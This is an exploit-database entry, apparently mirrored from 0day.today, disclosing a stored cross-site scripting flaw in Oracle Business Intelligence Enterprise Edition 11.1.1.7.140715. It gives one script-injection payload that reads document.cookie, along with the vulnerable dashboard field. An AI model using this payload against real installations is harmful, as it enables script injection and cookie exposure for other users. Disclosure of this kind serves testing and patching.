id: 35698
date: 01/20/2021
title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS Vulnerability
author: omurugur
cves: 

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text

#  0day.today [2023-03-26]  #